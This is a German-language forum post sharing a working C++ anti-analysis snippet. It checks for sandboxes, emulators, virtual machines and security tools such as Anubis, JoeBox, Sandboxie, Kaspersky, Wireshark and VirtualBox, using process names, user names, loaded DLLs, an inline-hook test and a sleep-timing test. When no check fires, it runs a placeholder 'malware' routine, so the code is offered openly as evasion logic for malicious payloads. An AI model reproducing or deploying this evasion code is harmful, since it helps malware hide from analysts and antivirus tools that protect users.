Joa, biete hier ein simples Snippet für euch an, das ich vor nen paar Wochen geschrieben hatte.

Es erkennt einige Sandboxes/Emus, wie Anubis, Threat Expert, Sandbox, JoeBox, Norman, WireShark, Kaspersky, iDEFENSE sysAnalyzer, Sunbelt, Sandboxie, Virtual PC, Virtual Box und andere.

Code:
#include <iostream>
#include <string>
#include <Windows.h>   
#include <tlhelp32.h>
#include <TCHAR.H>   
#include <dir.h>

using namespace std;

// Process-wide flag. Every Is*() check in this file sets it to 1 when it fires and
// nothing resets it; IsAll() reads it to decide whether to stop before the payload stub.
int detected = 0;

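// Writes the directory part of a module's file name into pszBuffer, keeping the
// trailing backslash.
//
//   hInst      module handle; NULL selects the current executable
//   pszBuffer  receives the path, must have room for dwSize TCHARs
//   dwSize     capacity of pszBuffer in TCHARs
//
// Returns the index of the last backslash in the path. Returns 0 when the buffer is
// unusable, the path could not be obtained, the path was truncated, or no backslash
// exists past index 0; in the first three cases the buffer is left empty.
DWORD GetModulePath(HINSTANCE hInst,LPTSTR pszBuffer,DWORD dwSize)
{
    if(pszBuffer == NULL || dwSize == 0)
    {
        return 0;
    }

    DWORD dwLength = GetModuleFileName(hInst,pszBuffer,dwSize);

    // GetModuleFileName returns dwSize when the path did not fit. Indexing
    // pszBuffer[dwSize] would then read past the end of the buffer, so a truncated
    // result is treated like a failure.
    if(dwLength == 0 || dwLength >= dwSize)
    {
        pszBuffer[ 0 ] = _T('\000');
        return 0;
    }

    // Walk back from the terminator to the last path separator.
    while(dwLength && pszBuffer[ dwLength ] != _T('\\'))
    {
        dwLength--;
    }

    if(dwLength)
    {
        // Cut the file name off, keeping the separator itself.
        pszBuffer[ dwLength + 1 ] = _T('\000');
    }

    return dwLength;
}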

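// Reports whether the process list contains an entry whose image name equals szExeName.
//
//   szExeName  image name to look for; compared with strcmp, so the match is exact
//              and case-sensitive
//
// Returns 1 on a match, 0 otherwise (including when no snapshot could be taken).
//
// NOTE(review): the cast of pce.szExeFile to const char* is only meaningful in an
// ANSI build, where PROCESSENTRY32 carries a char array.
BOOL IsProcessRunning(const std::string szExeName)
{
    // Only the process list is needed; TH32CS_SNAPALL would also capture heaps,
    // modules and threads for no benefit.
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if(hSnapshot == INVALID_HANDLE_VALUE)
    {
        return 0;
    }

    PROCESSENTRY32 pce = {sizeof(PROCESSENTRY32)};
    BOOL bFound = 0;

    if(Process32First(hSnapshot, &pce))
    {
        do
        {
            if(!strcmp((const char*)pce.szExeFile, szExeName.c_str()))
            {
                bFound = 1;
                break;
            }
        }while( Process32Next(hSnapshot, &pce) );
    }

    // The snapshot is a kernel handle; without this every call leaked one.
    CloseHandle(hSnapshot);

    return bFound;
}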

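// Reports whether the name of the user running this process equals comp.
//
//   comp  user name to compare against; strcmp is used, so the match is exact and
//         case-sensitive
//
// Returns 1 on a match, 0 otherwise (including when the user name cannot be read).
BOOL IsUsername(const std::string comp)
{
    // 256 characters (the UNLEN limit) plus the terminating NUL. The previous
    // 30-byte buffer made GetUserName fail for longer names.
    char username[257] = {0};
    DWORD nSize = sizeof(username);

    // The call was unchecked before, so a failure led to strcmp on an
    // uninitialised buffer.
    if(!GetUserNameA(username, &nSize))
    {
        return 0;
    }

    return strcmp(username, comp.c_str()) == 0 ? 1 : 0;
}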

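// Reports whether the full path of the running executable contains filefold.
//
//   filefold  substring to look for (strstr, case-sensitive); NULL is treated as
//             "no match"
//
// Returns 1 when the substring occurs in the path, 0 otherwise (including when the
// path cannot be read or does not fit into MAX_PATH characters).
BOOL IsFileInFolder(const char* filefold)
{
    if(filefold == NULL)
    {
        return 0;
    }

    char buff[MAX_PATH];
    const DWORD len = GetModuleFileNameA(NULL, buff, sizeof(buff));

    // 0 means the call failed and buff holds nothing usable; a value equal to the
    // buffer size means the path was truncated. Neither case was checked before.
    if(len == 0 || len >= sizeof(buff))
    {
        return 0;
    }

    return strstr(buff, filefold) != NULL ? 1 : 0;
}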

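// Reports whether comp names an existing directory.
//
//   comp  path to test
//
// Returns 1 when the path exists and is a directory, 0 otherwise.
//
// The earlier chdir() probe answered the same question by changing the working
// directory of the whole process as a side effect; querying the attributes leaves
// the working directory alone.
BOOL IsFolderExist(const std::string comp)
{
    const DWORD attrs = GetFileAttributesA(comp.c_str());

    if(attrs == INVALID_FILE_ATTRIBUTES)
    {
        return 0;
    }

    return (attrs & FILE_ATTRIBUTE_DIRECTORY) ? 1 : 0;
}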

// Anubis check: fires when the path of the running executable contains C:\InsideTm\.
// Sets the global `detected` flag and returns 1 on a hit, otherwise returns 0.
BOOL IsAnubis()
{
    const bool pathMatches = (IsFileInFolder("C:\\InsideTm\\") == 1);

    if (!pathMatches)
    {
        return 0;
    }

    detected = 1;
    return 1;
}

// Check reported by IsAll() as "Threat Expert": fires when the current user name is
// exactly "username". Any host whose account carries that name matches as well.
// Sets the global `detected` flag and returns 1 on a hit, otherwise returns 0.
BOOL IsTE()
{
    const bool nameMatches = (IsUsername("username") == 1);

    if (!nameMatches)
    {
        return 0;
    }

    detected = 1;
    return 1;
}

// Generic "Sandbox" check: fires when the current user name is exactly "user".
// The name is common, so this also matches ordinary machines.
// Sets the global `detected` flag and returns 1 on a hit, otherwise returns 0.
BOOL IsSandbox()
{
    const bool nameMatches = (IsUsername("user") == 1);

    if (!nameMatches)
    {
        return 0;
    }

    detected = 1;
    return 1;
}

// JoeBox check: fires when a process named joeboxserver.exe or joeboxcontrol.exe is
// in the process list. The second name is only looked up when the first is absent.
// Sets the global `detected` flag and returns 1 on a hit, otherwise returns 0.
BOOL IsJB()
{
    bool running = (IsProcessRunning("joeboxserver.exe") == 1);

    if (!running)
    {
        running = (IsProcessRunning("joeboxcontrol.exe") == 1);
    }

    if (!running)
    {
        return 0;
    }

    detected = 1;
    return 1;
}

// Norman check: fires when the current user name is exactly "currentuser".
// Sets the global `detected` flag and returns 1 on a hit, otherwise returns 0.
BOOL IsNorman()
{
    const bool nameMatches = (IsUsername("currentuser") == 1);

    if (!nameMatches)
    {
        return 0;
    }

    detected = 1;
    return 1;
}

// Wireshark check: fires when a process named wireshark.exe is in the process list.
// Sets the global `detected` flag and returns 1 on a hit, otherwise returns 0.
BOOL IsWireShark()
{
    const bool running = (IsProcessRunning("wireshark.exe") == 1);

    if (!running)
    {
        return 0;
    }

    detected = 1;
    return 1;
}

// Kaspersky check: fires when a process named avp.exe is in the process list.
// Sets the global `detected` flag and returns 1 on a hit, otherwise returns 0.
BOOL IsKaspersky()
{
    const bool running = (IsProcessRunning("avp.exe") == 1);

    if (!running)
    {
        return 0;
    }

    detected = 1;
    return 1;
}


// Check reported by IsAll() as "iDEFENSE sysAnalyzer". Fires when api_log.dll or
// dir_watch.dll is loaded in this process, or when sniff_hit.exe or sysAnalyzer.exe
// is in the process list. The process list is only walked when neither DLL is loaded.
// Sets the global `detected` flag and returns 1 on a hit, otherwise returns 0.
BOOL IsID() //Sunbelt & Sandboxie included
{
    // Injected monitoring DLLs show up as loaded modules of the process itself.
    bool hit = GetModuleHandle("api_log.dll") || GetModuleHandle("dir_watch.dll");

    if (!hit)
    {
        hit = IsProcessRunning("sniff_hit.exe") == 1 || IsProcessRunning("sysAnalyzer.exe") == 1;
    }

    if (!hit)
    {
        return 0;
    }

    detected = 1;
    return 1;
}

// Sunbelt check: fires when pstorec.dll is loaded in this process or, failing that,
// when the folder C:\analysis exists.
// Sets the global `detected` flag and returns 1 on a hit, otherwise returns 0.
BOOL IsSunbelt()
{
    bool hit = (GetModuleHandle("pstorec.dll") != NULL);

    if (!hit)
    {
        // The folder probe only runs when the module is not loaded.
        hit = (IsFolderExist("C:\\analysis") == 1);
    }

    if (!hit)
    {
        return 0;
    }

    detected = 1;
    return 1;
}

// Sandboxie check: fires when SbieDll.dll is loaded in this process.
// Sets the global `detected` flag and returns 1 on a hit, otherwise returns 0.
BOOL IsSandboxie()
{
    const bool moduleLoaded = (GetModuleHandle("SbieDll.dll") != NULL);

    if (!moduleLoaded)
    {
        return 0;
    }

    detected = 1;
    return 1;
}

// Check reported by IsAll() as "Virtual PC". Loads C:\vmcheck.dll and looks up its
// export IsRunningInsideVirtualMachine.
//
// Returns 1 and sets the global `detected` flag when the DLL loads and the export
// exists; returns 0 when the DLL is missing or lacks the export.
//
// NOTE(review): the export is called, but its return value is never consulted, so
// the outcome depends only on the export being present. LoadLibrary also runs the
// initialisation code of whatever file sits at that fixed path.
BOOL IsVPC() //steve10120
{
  typedef BOOL (WINAPI *VmCheckFn)();

  HMODULE dll = LoadLibrary("C:\\vmcheck.dll");

  if(!dll)
  {
      return 0;
  }

  VmCheckFn fnIsRunningInsideVirtualMachine = (VmCheckFn) GetProcAddress(dll, "IsRunningInsideVirtualMachine");

  BOOL found = 0;

  if(fnIsRunningInsideVirtualMachine)
  {
      BOOL retValue = fnIsRunningInsideVirtualMachine();
      (void)retValue; // result is discarded, as before
      detected = 1;
      found = 1;
  }

  // Single release point for both outcomes.
  FreeLibrary(dll);

  return found;
}

// Reads the first byte of kernel32!CreateProcessA in this process and fires when it
// is 0xE9. 0xE9 is the x86 opcode of a near relative JMP, so this presumably looks
// for an inline hook placed at the function entry by a monitoring tool.
// Sets the global `detected` flag and returns 1 on a hit, otherwise returns 0.
//
// NOTE(review): the address is narrowed to unsigned long, which is 32 bits wide on
// Windows, and the result of ReadProcessMemory is not checked, so bBuffer may be
// compared without ever having been written.
BOOL IsOther() //carb0n
{
   unsigned char bBuffer;

   HMODULE hKernel = GetModuleHandle( "KERNEL32.dll" );
   unsigned long aCreateProcess = (unsigned long)GetProcAddress( hKernel, "CreateProcessA" );

   ReadProcessMemory( GetCurrentProcess( ), (void *) aCreateProcess, &bBuffer, 1, 0 );

   if( bBuffer != 0xE9 )
   {
       return 0;
   }

   detected = 1;
   return 1;
}

// Timing check: takes GetTickCount before and after Sleep(500) and fires when fewer
// than 500 ticks elapsed, i.e. when the sleep appears to have been shortened or skipped.
// Sets the global `detected` flag and returns 1 on a hit, otherwise returns 0.
// Always costs the caller the sleep itself.
BOOL IsEmu() //Noble & ChainCoder
{
    const DWORD before = GetTickCount();
    Sleep(500);
    const DWORD elapsed = GetTickCount() - before; // unsigned, survives tick wrap-around

    if (elapsed >= 500)
    {
        return 0;
    }

    detected = 1;
    return 1;
}

// VirtualBox check: fires when a process named VBoxService.exe is in the process list.
// Sets the global `detected` flag and returns 1 on a hit, otherwise returns 0.
BOOL IsVB()
{
    const bool running = (IsProcessRunning("VBoxService.exe") == 1);

    if (!running)
    {
        return 0;
    }

    detected = 1;
    return 1;
}


// Placeholder for the code that runs when no check fired: it only prints the word
// "MALWARE" to stdout. Always returns 0.
BOOL malware()
{
    //some malware code
    std::cout << "MALWARE" << std::endl;

    return 0;
}


// Runs the environment checks in a fixed order and stops at the first one that
// fires, printing the matching message. Afterwards the global `detected` flag
// decides the outcome: when it is set, the function prints an exit notice and
// returns 1; otherwise it calls malware() and returns 0.
//
// For triage: the literal process, module, user and folder names used by the checks
// called from here are fixed strings in the binary.
BOOL IsAll()
{
    // Check/message pairs in evaluation order.
    struct Probe
    {
        BOOL (*check)();
        const char* message;
    };

    static const Probe probes[] =
    {
        { IsAnubis,    "Anubis detected..." },
        { IsTE,        "Threat Expert detected..." },
        { IsSandbox,   "Sandbox detected..." },
        { IsJB,        "JoeBox detected..." },
        { IsNorman,    "Norman detected" },
        { IsWireShark, "WireShark detected" },
        { IsKaspersky, "Kaspersky detected" },
        { IsID,        "iDEFENSE sysAnalyzer detected" },
        { IsSunbelt,   "Sunbelt detected" },
        { IsSandboxie, "Sandboxie detected" },
        { IsVPC,       "Virtual PC detected" },
        { IsVB,        "Virtual Box detected" },
    };
    const size_t probeCount = sizeof(probes) / sizeof(probes[0]);

    bool reported = false;

    for (size_t i = 0; i < probeCount && !reported; ++i)
    {
        if (probes[i].check() == 1)
        {
            std::cout << probes[i].message << std::endl;
            reported = true;
        }
    }

    // The two generic checks share one message and only run when nothing above fired;
    // IsEmu() is skipped when IsOther() already fired.
    if (!reported && (IsOther() == 1 || IsEmu() == 1))
    {
        std::cout << "Some others detected" << std::endl;
    }

    if (detected == 0)
    {
        std::cout << "Nothing found, executing malware..." << std::endl;
        malware();

        return 0;
    }

    std::cout << "Detected some Emulators/sandboxs, exiting...\a" << std::endl;

    return 1;
}

// Entry point: runs the combined environment check once, then keeps the console
// window open until a key is pressed.
int main()
{
    const BOOL environmentFlagged = IsAll();
    (void)environmentFlagged; // the exit code does not depend on the outcome

    system("PAUSE");
    return 0;
}